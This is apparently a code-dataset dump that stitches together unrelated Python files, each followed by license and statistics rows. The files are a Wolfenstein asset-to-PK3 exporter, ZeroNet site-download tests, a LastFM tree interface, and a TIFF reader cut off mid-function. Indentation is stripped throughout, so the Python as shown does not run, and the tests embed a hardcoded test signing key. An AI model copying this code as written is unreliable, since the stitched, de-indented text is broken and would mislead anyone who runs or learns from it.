result = array_to_rgbx(accum, rgba_image.size, 4)
return result
def export_sprites(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sprites')
start = vswap_chunks_handler.sprites_start
count = vswap_chunks_handler.sounds_start - start
sprite_manager = pywolf.graphics.SpriteManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count, params.alpha_index)
scaled_size = [side * params.texture_scale for side in cfg.SPRITE_DIMENSIONS]
for i, sprite in enumerate(sprite_manager):
name = cfg.SPRITE_NAMES[i]
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
logger.info('Sprite [%d/%d]: %r', (i + 1), count, path)
image = sprite.image.convert('RGBA')
if params.fix_alpha_halo:
alpha_layer = image.split()[-1].transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
image = image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
if params.fix_alpha_halo:
image = fix_sprite_halo(image, alpha_layer)
pixels_bgra = bytes(x for pixel in image.getdata()
for x in [pixel[2], pixel[1], pixel[0], pixel[3]])
sprite_stream = io.BytesIO()
write_targa_bgrx(sprite_stream, scaled_size, 32, pixels_bgra)
zip_file.writestr(path, sprite_stream.getbuffer())
logger.info('Done')
_sep()
def export_pictures(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting pictures')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['pics']
picture_manager = pywolf.graphics.PictureManager(graphics_chunks_handler, palette_map, start, count)
for i, picture in enumerate(picture_manager):
path = 'gfx/{}/{}.tga'.format(params.short_name, cfg.PICTURE_NAMES[i])
logger.info('Picture [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = picture.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
picture_stream = io.BytesIO()
write_targa_bgrx(picture_stream, picture.dimensions, 24, pixels_bgr)
zip_file.writestr(path, picture_stream.getbuffer())
logger.info('Done')
_sep()
def export_tile8(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tile8')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['tile8']
tile8_manager = pywolf.graphics.Tile8Manager(graphics_chunks_handler, palette_map, start, count)
for i, tile8 in enumerate(tile8_manager):
path = 'gfx/{}/tile8__{}.tga'.format(params.short_name, cfg.TILE8_NAMES[i])
logger.info('Tile8 [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = tile8.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
tile8_stream = io.BytesIO()
write_targa_bgrx(tile8_stream, tile8.dimensions, 24, pixels_bgr)
zip_file.writestr(path, tile8_stream.getbuffer())
logger.info('Done')
_sep()
def export_screens(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting DOS screens')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['screens']
screen_manager = pywolf.graphics.DOSScreenManager(graphics_chunks_handler, start, count)
for i, screen in enumerate(screen_manager):
path = 'texts/{}/screens/{}.scr'.format(params.short_name, cfg.SCREEN_NAMES[i])
logger.info('DOS Screen [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, screen.data)
logger.info('Done')
_sep()
def export_helparts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting HelpArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['helpart']
helpart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, helpart in enumerate(helpart_manager):
path = 'texts/{}/helpart/helpart_{}.txt'.format(params.short_name, i)
logger.info('HelpArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, helpart.encode('ascii'))
logger.info('Done')
_sep()
def export_endarts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting EndArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['endart']
endart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, endart in enumerate(endart_manager):
path = 'texts/{}/endart/endart_{}.txt'.format(params.short_name, i)
logger.info('EndArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, endart.encode('ascii'))
logger.info('Done')
_sep()
def export_sampled_sounds(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sampled sounds')
start = vswap_chunks_handler.sounds_start
count = len(vswap_chunks_handler.sounds_infos)
sample_manager = pywolf.audio.SampledSoundManager(vswap_chunks_handler,
cfg.SAMPLED_SOUND_FREQUENCY,
start, count)
scale_factor = params.wave_rate / cfg.SAMPLED_SOUND_FREQUENCY
for i, sound in enumerate(sample_manager):
name = cfg.SAMPLED_SOUND_NAMES[i]
path = 'sound/{}/sampled/{}.wav'.format(params.short_name, name)
logger.info('Sampled sound [%d/%d]: %r', (i + 1), count, path)
samples = bytes(samples_upsample(sound.samples, scale_factor))
wave_file = io.BytesIO()
wave_write(wave_file, params.wave_rate, samples)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_musics(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting musics')
start, count = cfg.AUDIO_PARTITIONS_MAP['music']
for i in range(count):
chunk_index = start + i
name = cfg.MUSIC_LABELS[i]
path = 'music/{}/{}.ogg'.format(params.short_name, name)
logger.info('Music [%d/%d]: %r', (i + 1), count, path)
imf_chunk = audio_chunks_handler[chunk_index]
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
try:
ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
zip_file.write(ogg_path, path)
finally:
_force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_adlib_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting AdLib sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['adlib']
adlib_manager = pywolf.audio.AdLibSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(adlib_manager):
name = cfg.ADLIB_SOUND_NAMES[i]
path = 'sound/{}/adlib/{}.ogg'.format(params.short_name, name)
logger.info('AdLib sound [%d/%d]: %r', (i + 1), count, path)
imf_chunk = sound.to_imf_chunk()
wave_path = convert_imf_to_wave(imf_chunk, params.imf2wav_path,
wave_rate=params.ogg_rate, imf_rate=params.imf_rate)
try:
ogg_path = convert_wave_to_ogg(wave_path, params.oggenc2_path)
zip_file.write(ogg_path, path)
finally:
_force_unlink(wave_path, ogg_path)
logger.info('Done')
_sep()
def export_buzzer_sounds(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting buzzer sounds')
start, count = cfg.AUDIO_PARTITIONS_MAP['buzzer']
buzzer_manager = pywolf.audio.BuzzerSoundManager(audio_chunks_handler, start, count)
for i, sound in enumerate(buzzer_manager):
name = cfg.BUZZER_SOUND_NAMES[i]
path = 'sound/{}/buzzer/{}.wav'.format(params.short_name, name)
logger.info('Buzzer sound [%d/%d]: %r', (i + 1), count, path)
wave_file = io.BytesIO()
sound.wave_write(wave_file, params.wave_rate)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_tilemaps(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tilemaps (Q3Map2 *.map)')
start, count = 0, sum(episode[1] for episode in cfg.EPISODES)
tilemap_manager = pywolf.game.TileMapManager(audio_chunks_handler, start, count)
i = 1
for episode_index, episode in enumerate(cfg.EPISODES):
for submap_index in range(episode[1]):
tilemap_index = episode[0] + submap_index
tilemap = tilemap_manager[tilemap_index]
name = '{}_e{}m{}'.format(params.short_name, episode_index + 1, submap_index + 1)
folder = os.path.join(params.output_folder, 'maps')
os.makedirs(folder, exist_ok=True)
path = os.path.join(folder, (name + '.map'))
logger.info('TileMap [%d/%d]: %r = %r', i, count, path, tilemap.name)
exporter = MapExporter(params, cfg, tilemap, episode_index, submap_index)
description = '\n'.join(exporter.describe_tilemap())
with open(path, 'wt') as map_file:
map_file.write(description)
path = 'maps/{}.map'.format(name)
zip_file.writestr(path, description)
i += 1
logger.info('Done')
_sep()
def main(*args):
logger = logging.getLogger()
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
logger.addHandler(stdout_handler)
logger.setLevel(logging.DEBUG)
parser = build_argument_parser()
params = parser.parse_args(args)
logger.info('Command-line parameters:')
for key, value in sorted(params.__dict__.items()):
logger.info('%s = %r', key, value)
_sep()
cfg = load_as_module('cfg', params.cfg)
vswap_data_path = os.path.join(params.input_folder, params.vswap_data)
logger.info('Precaching VSwap chunks: <data>=%r', vswap_data_path)
vswap_chunks_handler = pywolf.persistence.VSwapChunksHandler()
with open(vswap_data_path, 'rb') as data_file:
vswap_chunks_handler.load(data_file)
vswap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(vswap_chunks_handler)
_sep()
audio_data_path = os.path.join(params.input_folder, params.audio_data)
audio_header_path = os.path.join(params.input_folder, params.audio_header)
logger.info('Precaching audio chunks: <data>=%r, <header>=%r', audio_data_path, audio_header_path)
audio_chunks_handler = pywolf.persistence.AudioChunksHandler()
with open(audio_data_path, 'rb') as (data_file
), open(audio_header_path, 'rb') as header_file:
audio_chunks_handler.load(data_file, header_file)
audio_chunks_handler = pywolf.persistence.PrecachedChunksHandler(audio_chunks_handler)
_sep()
graphics_data_path = os.path.join(params.input_folder, params.graphics_data)
graphics_header_path = os.path.join(params.input_folder, params.graphics_header)
graphics_huffman_path = os.path.join(params.input_folder, params.graphics_huffman)
logger.info('Precaching graphics chunks: <data>=%r, <header>=%r, <huffman>=%r',
graphics_data_path, graphics_header_path, graphics_huffman_path)
graphics_chunks_handler = pywolf.persistence.GraphicsChunksHandler()
with open(graphics_data_path, 'rb') as (data_file
), open(graphics_header_path, 'rb') as (header_file
), open(graphics_huffman_path, 'rb') as huffman_file:
graphics_chunks_handler.load(data_file, header_file, huffman_file, cfg.GRAPHICS_PARTITIONS_MAP)
graphics_chunks_handler = pywolf.persistence.PrecachedChunksHandler(graphics_chunks_handler)
_sep()
maps_data_path = os.path.join(params.input_folder, params.maps_data)
maps_header_path = os.path.join(params.input_folder, params.maps_header)
logger.info('Precaching map chunks: <data>=%r, <header>=%r', maps_data_path, maps_header_path)
tilemap_chunks_handler = pywolf.persistence.MapChunksHandler()
with open(maps_data_path, 'rb') as (data_file
), open(maps_header_path, 'rb') as header_file:
tilemap_chunks_handler.load(data_file, header_file)
tilemap_chunks_handler = pywolf.persistence.PrecachedChunksHandler(tilemap_chunks_handler)
_sep()
pk3_path = os.path.join(params.output_folder, params.output_pk3)
logger.info('Creating PK3 (ZIP/deflated) file: %r', pk3_path)
with zipfile.ZipFile(pk3_path, 'w', zipfile.ZIP_DEFLATED) as pk3_file:
_sep()
export_tilemaps(params, cfg, pk3_file, tilemap_chunks_handler)
export_shaders(params, cfg, pk3_file)
export_textures(params, cfg, pk3_file, vswap_chunks_handler)
export_sprites(params, cfg, pk3_file, vswap_chunks_handler)
export_pictures(params, cfg, pk3_file, graphics_chunks_handler)
export_tile8(params, cfg, pk3_file, graphics_chunks_handler)
export_screens(params, cfg, pk3_file, graphics_chunks_handler)
export_helparts(params, cfg, pk3_file, graphics_chunks_handler)
export_endarts(params, cfg, pk3_file, graphics_chunks_handler)
export_sampled_sounds(params, cfg, pk3_file, vswap_chunks_handler)
export_adlib_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_buzzer_sounds(params, cfg, pk3_file, audio_chunks_handler)
export_musics(params, cfg, pk3_file, audio_chunks_handler)
logger.info('PK3 archived successfully')
if __name__ == '__main__':
main(*sys.argv[1:])
|
gpl-3.0
| 7,717,207,670,447,818,000
| 39.547742
| 116
| 0.571163
| false
| 3.404789
| false
| false
| false
|
frerepoulet/ZeroNet
|
src/Test/TestSiteDownload.py
|
1
|
15361
|
import time
import pytest
import mock
import gevent
from Connection import ConnectionServer
from Config import config
from File import FileRequest
from File import FileServer
from Site import Site
import Spy
@pytest.mark.usefixtures("resetTempSettings")
@pytest.mark.usefixtures("resetSettings")
class TestSiteDownload:
def testDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
with Spy.Spy(FileRequest, "route") as requests:
def boostRequest(inner_path):
# I really want these file
if inner_path == "index.html":
site_temp.needFile("data/img/multiuser.png", priority=5, blocking=False)
site_temp.needFile("data/img/direct_domains.png", priority=5, blocking=False)
site_temp.onFileDone.append(boostRequest)
site_temp.download(blind_includes=True).join(timeout=5)
file_requests = [request[2]["inner_path"] for request in requests if request[0] in ("getFile", "streamFile")]
# Test priority
assert file_requests[0:2] == ["content.json", "index.html"] # Must-have files
assert file_requests[2:4] == ["css/all.css", "js/all.js"] # Important assets
assert file_requests[4] == "dbschema.json" # Database map
assert file_requests[5:7] == ["data/img/multiuser.png", "data/img/direct_domains.png"] # Directly requested files
assert "-default" in file_requests[-1] # Put default files for cloning to the end
# Check files
bad_files = site_temp.storage.verifyFiles(quick_check=True)
# -1 because data/users/1J6... user has invalid cert
assert len(site_temp.content_manager.contents) == len(site.content_manager.contents) - 1
assert not bad_files
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
def testArchivedDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Download normally
site_temp.addPeer("127.0.0.1", 1544)
site_temp.download(blind_includes=True).join(timeout=5)
bad_files = site_temp.storage.verifyFiles(quick_check=True)
assert not bad_files
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" in site_temp.content_manager.contents
assert site_temp.storage.isFile("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 2
# Add archived data
assert not "archived" in site.content_manager.contents["data/users/content.json"]["user_contents"]
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", time.time()-1)
site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"] = {"1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q": time.time()}
site.content_manager.sign("data/users/content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
date_archived = site.content_manager.contents["data/users/content.json"]["user_contents"]["archived"]["1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q"]
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived-1)
assert site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived)
assert not site.content_manager.isArchived("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json", date_archived+1) # Allow user to update archived data later
# Push archived update
assert not "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
site.publish()
site_temp.download(blind_includes=True).join(timeout=5) # Wait for download
# The archived content should disappear from remote client
assert "archived" in site_temp.content_manager.contents["data/users/content.json"]["user_contents"]
assert "data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q/content.json" not in site_temp.content_manager.contents
assert not site_temp.storage.isDir("data/users/1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q")
assert len(list(site_temp.storage.query("SELECT * FROM comment"))) == 1
assert len(list(site_temp.storage.query("SELECT * FROM json WHERE directory LIKE '%1C5sgvWaSgfaTpV5kjBCnCiKtENNMYo69q%'"))) == 0
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer has the optional file
def testOptionalDownload(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = ConnectionServer("127.0.0.1", 1545)
site_temp.connection_server = client
site_temp.announce = mock.MagicMock(return_value=True) # Don't try to find peers from the net
site_temp.addPeer("127.0.0.1", 1544)
# Download site
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
site.storage.verifyFiles(quick_check=True) # Find what optional files we have
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.storage.isFile("data/optional.txt")
assert site.storage.isFile("data/optional.txt")
site_temp.needFile("data/optional.txt")
assert site_temp.storage.isFile("data/optional.txt")
# Optional user file
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
optional_file_info = site_temp.content_manager.getFileInfo(
"data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif"
)
assert site.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert not site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.content_manager.hashfield.hasHash(optional_file_info["sha512"])
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
# Test when connected peer does not has the file, so ask him if he know someone who has it
def testFindOptional(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init full source server (has optional files)
site_full = Site("1TeSTvb4w2PWE81S2rEELgmX2GCCExQGT")
file_server_full = FileServer("127.0.0.1", 1546)
site_full.connection_server = file_server_full
gevent.spawn(lambda: ConnectionServer.start(file_server_full))
time.sleep(0.001) # Port opening
file_server_full.sites[site_full.address] = site_full # Add site
site_full.storage.verifyFiles(quick_check=True) # Check optional files
site_full_peer = site.addPeer("127.0.0.1", 1546) # Add it to source server
hashfield = site_full_peer.updateHashfield() # Update hashfield
assert len(site_full.content_manager.hashfield) == 8
assert hashfield
assert site_full.storage.isFile("data/optional.txt")
assert site_full.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert len(site_full_peer.hashfield) == 8
# Remove hashes from source server
for hash in list(site.content_manager.hashfield):
site.content_manager.hashfield.remove(hash)
# Init client server
site_temp.connection_server = ConnectionServer("127.0.0.1", 1545)
site_temp.addPeer("127.0.0.1", 1544) # Add source server
# Download normal files
site_temp.log.info("Start Downloading site")
site_temp.download(blind_includes=True).join(timeout=5)
# Download optional data/optional.txt
optional_file_info = site_temp.content_manager.getFileInfo("data/optional.txt")
optional_file_info2 = site_temp.content_manager.getFileInfo("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site_temp.storage.isFile("data/optional.txt")
assert not site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert not site.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # Source server don't know he has the file
assert not site.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # Source server don't know he has the file
assert site_full_peer.hashfield.hasHash(optional_file_info["sha512"]) # Source full peer on source server has the file
assert site_full_peer.hashfield.hasHash(optional_file_info2["sha512"]) # Source full peer on source server has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info["sha512"]) # Source full server he has the file
assert site_full.content_manager.hashfield.hasHash(optional_file_info2["sha512"]) # Source full server he has the file
site_temp.log.info("Request optional files")
with Spy.Spy(FileRequest, "route") as requests:
# Request 2 file same time
threads = []
threads.append(site_temp.needFile("data/optional.txt", blocking=False))
threads.append(site_temp.needFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif", blocking=False))
gevent.joinall(threads)
assert len([request for request in requests if request[0] == "findHashIds"]) == 1 # findHashids should call only once
assert site_temp.storage.isFile("data/optional.txt")
assert site_temp.storage.isFile("data/users/1CjfbrbwtP8Y2QjPy12vpTATkUT7oSiPQ9/peanut-butter-jelly-time.gif")
assert site_temp.storage.deleteFiles()
file_server_full.stop()
[connection.close() for connection in file_server.connections]
def testUpdate(self, file_server, site, site_temp):
file_server.ip_incoming = {} # Reset flood protection
assert site.storage.directory == config.data_dir + "/" + site.address
assert site_temp.storage.directory == config.data_dir + "-temp/" + site.address
# Init source server
site.connection_server = file_server
file_server.sites[site.address] = site
# Init client server
client = FileServer("127.0.0.1", 1545)
client.sites[site_temp.address] = site_temp
site_temp.connection_server = client
# Don't try to find peers from the net
site.announce = mock.MagicMock(return_value=True)
site_temp.announce = mock.MagicMock(return_value=True)
# Connect peers
site_temp.addPeer("127.0.0.1", 1544)
# Download site from site to site_temp
site_temp.download(blind_includes=True).join(timeout=5)
# Update file
data_original = site.storage.open("data/data.json").read()
data_new = data_original.replace('"ZeroBlog"', '"UpdatedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json", "wb").write(data_new)
assert site.storage.open("data/data.json").read() == data_new
assert site_temp.storage.open("data/data.json").read() == data_original
site.log.info("Publish new data.json without patch")
# Publish without patch
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish()
time.sleep(0.1)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 1
assert site_temp.storage.open("data/data.json").read() == data_new
# Close connection to avoid update spam limit
site.peers.values()[0].remove()
site.addPeer("127.0.0.1", 1545)
site_temp.peers.values()[0].ping() # Connect back
time.sleep(0.1)
# Update with patch
data_new = data_original.replace('"ZeroBlog"', '"PatchedZeroBlog"')
assert data_original != data_new
site.storage.open("data/data.json-new", "wb").write(data_new)
assert site.storage.open("data/data.json-new").read() == data_new
assert site_temp.storage.open("data/data.json").read() != data_new
# Generate diff
diffs = site.content_manager.getDiffs("content.json")
assert not site.storage.isFile("data/data.json-new") # New data file removed
assert site.storage.open("data/data.json").read() == data_new # -new postfix removed
assert "data/data.json" in diffs
assert diffs["data/data.json"] == [('=', 2), ('-', 29), ('+', ['\t"title": "PatchedZeroBlog",\n']), ('=', 31102)]
# Publish with patch
site.log.info("Publish new data.json with patch")
with Spy.Spy(FileRequest, "route") as requests:
site.content_manager.sign("content.json", privatekey="5KUh3PvNm5HUWoCfSUfcYvfQ2g3PrRNJWr6Q9eqdBGu23mtMntv")
site.publish(diffs=diffs)
site_temp.download(blind_includes=True).join(timeout=5)
assert len([request for request in requests if request[0] in ("getFile", "streamFile")]) == 0
assert site_temp.storage.open("data/data.json").read() == data_new
assert site_temp.storage.deleteFiles()
[connection.close() for connection in file_server.connections]
|
gpl-2.0
| -2,810,019,909,871,408,600
| 50.720539
| 173
| 0.679643
| false
| 3.386464
| true
| false
| false
|
UB-info/estructura-datos
|
RafaelArqueroGimeno_S6/ABBInterface.py
|
1
|
1812
|
import copy
from itertools import cycle, islice
from model import *
import view
import parserLastFM
__author__ = "Rafael Arquero Gimeno"
def add(users, parser):
"""
:type users: ABB
:param parser: File parser
:return: A Binary Search Tree containing old + parsed values
"""
for user in islice(parser, 5000):
users.insert(user)
return users
def search(source, minimum=0.0, maximum=1.0):
"""Returns an iterator that returns values inside the interval in the given tree
:rtype : generator
:param source: Original Tree
:param minimum: lower bound
:param maximum: higher bound
"""
assert minimum <= maximum
# tree is passed by reference, copy is done to safely operate through tree
result = copy.copy(source)
result.deleteLower(minimum).deleteHigher(maximum)
return cycle(result) if result else None
def remove(source, minimum=0.0, maximum=1.0):
"""Returns a tree with with the values of given source if they are out of given interval
:type source: ABB
"""
assert minimum <= maximum
lowers, highers = copy.copy(source), copy.copy(source)
lowers.deleteHigher(minimum)
highers.deleteLower(maximum)
root = highers.min # the lowest of highers, can be the root
highers.delete(root, wholeNode=True)
result = ABB().insert(root)
result.root.left = lowers.root
result.root.right = highers.root
return result
def useful_info(tree):
"""Returns a string with useful info about the given ABB
:type tree: ABB
"""
return "Depth: " + str(tree.depth)
def emptyType():
return ABB()
if __name__ == "__main__":
parser = parserLastFM.parser("LastFM_small.dat")
app = view.MainApp(parser, add, search, remove, useful_info, emptyType())
app.mainloop()
|
mit
| -3,641,968,380,993,265,000
| 23.16
| 92
| 0.674393
| false
| 3.736082
| false
| false
| false
|
stuarteberg/lazyflow
|
lazyflow/operators/ioOperators/opTiffReader.py
|
1
|
7430
|
import numpy
# Note: tifffile can also be imported from skimage.external.tifffile.tifffile_local,
# but we can't use that module because it is based on a version of tifffile that has a bug.
# (It doesn't properly import the tifffile.c extension module.)
#import skimage.external.tifffile.tifffile_local as tifffile
import tifffile
import _tifffile
if tifffile.decodelzw != _tifffile.decodelzw:
import warnings
warnings.warn("tifffile C-extension is not working, probably due to a bug in tifffile._replace_by().\n"
"TIFF decompression will be VERY SLOW.")
import vigra
from lazyflow.graph import Operator, InputSlot, OutputSlot
from lazyflow.roi import roiToSlice
from lazyflow.request import RequestLock
import logging
logger = logging.getLogger(__name__)
class OpTiffReader(Operator):
"""
Reads TIFF files as an ND array. We use two different libraries:
- To read the image metadata (determine axis order), we use tifffile.py (by Christoph Gohlke)
- To actually read the data, we use vigra (which supports more compression types, e.g. JPEG)
Note: This operator intentionally ignores any colormap
information and uses only the raw stored pixel values.
(In fact, avoiding the colormapping is not trivial using the tifffile implementation.)
TODO: Add an option to output color-mapped pixels.
"""
Filepath = InputSlot()
Output = OutputSlot()
TIFF_EXTS = ['.tif', '.tiff']
def __init__(self, *args, **kwargs):
super( OpTiffReader, self ).__init__( *args, **kwargs )
self._filepath = None
self._page_shape = None
def setupOutputs(self):
self._filepath = self.Filepath.value
with tifffile.TiffFile(self._filepath) as tiff_file:
series = tiff_file.series[0]
if len(tiff_file.series) > 1:
raise RuntimeError("Don't know how to read TIFF files with more than one image series.\n"
"(Your image has {} series".format( len(tiff_file.series) ))
axes = series.axes
shape = series.shape
pages = series.pages
first_page = pages[0]
dtype_code = first_page.dtype
if first_page.is_palette:
# For now, we don't support colormaps.
# Drop the (last) channel axis
# (Yes, there can be more than one :-/)
last_C_pos = axes.rfind('C')
assert axes[last_C_pos] == 'C'
axes = axes[:last_C_pos] + axes[last_C_pos+1:]
shape = shape[:last_C_pos] + shape[last_C_pos+1:]
# first_page.dtype refers to the type AFTER colormapping.
# We want the original type.
key = (first_page.sample_format, first_page.bits_per_sample)
dtype_code = self._dtype = tifffile.TIFF_SAMPLE_DTYPES.get(key, None)
# From the tifffile.TiffPage code:
# -----
# The internal, normalized '_shape' attribute is 6 dimensional:
#
# 0. number planes (stk)
# 1. planar samples_per_pixel
# 2. image_depth Z (sgi)
# 3. image_length Y
# 4. image_width X
# 5. contig samples_per_pixel
(N, P, D, Y, X, S) = first_page._shape
assert N == 1, "Don't know how to handle any number of planes except 1 (per page)"
assert P == 1, "Don't know how to handle any number of planar samples per pixel except 1 (per page)"
assert D == 1, "Don't know how to handle any image depth except 1"
if S == 1:
self._page_shape = (Y,X)
self._page_axes = 'yx'
else:
assert shape[-3:] == (Y,X,S)
self._page_shape = (Y,X,S)
self._page_axes = 'yxc'
assert 'C' not in axes, \
"If channels are in separate pages, then each page can't have multiple channels itself.\n"\
"(Don't know how to weave multi-channel pages together.)"
self._non_page_shape = shape[:-len(self._page_shape)]
assert shape == self._non_page_shape + self._page_shape
assert self._non_page_shape or len(pages) == 1
axes = axes.lower().replace('s', 'c')
if 'i' in axes:
for k in 'tzc':
if k not in axes:
axes = axes.replace('i', k)
break
if 'i' in axes:
raise RuntimeError("Image has an 'I' axis, and I don't know what it represents. "
"(Separate T,Z,C axes already exist.)")
self.Output.meta.shape = shape
self.Output.meta.axistags = vigra.defaultAxistags( axes )
self.Output.meta.dtype = numpy.dtype(dtype_code).type
self.Output.meta.ideal_blockshape = ((1,) * len(self._non_page_shape)) + self._page_shape
def execute(self, slot, subindex, roi, result):
"""
Use vigra (not tifffile) to read the result.
This allows us to support JPEG-compressed TIFFs.
"""
num_page_axes = len(self._page_shape)
roi = numpy.array( [roi.start, roi.stop] )
page_index_roi = roi[:, :-num_page_axes]
roi_within_page = roi[:, -num_page_axes:]
logger.debug("Roi: {}".format(map(tuple, roi)))
# Read each page out individually
page_index_roi_shape = page_index_roi[1] - page_index_roi[0]
for roi_page_ndindex in numpy.ndindex(*page_index_roi_shape):
if self._non_page_shape:
tiff_page_ndindex = roi_page_ndindex + page_index_roi[0]
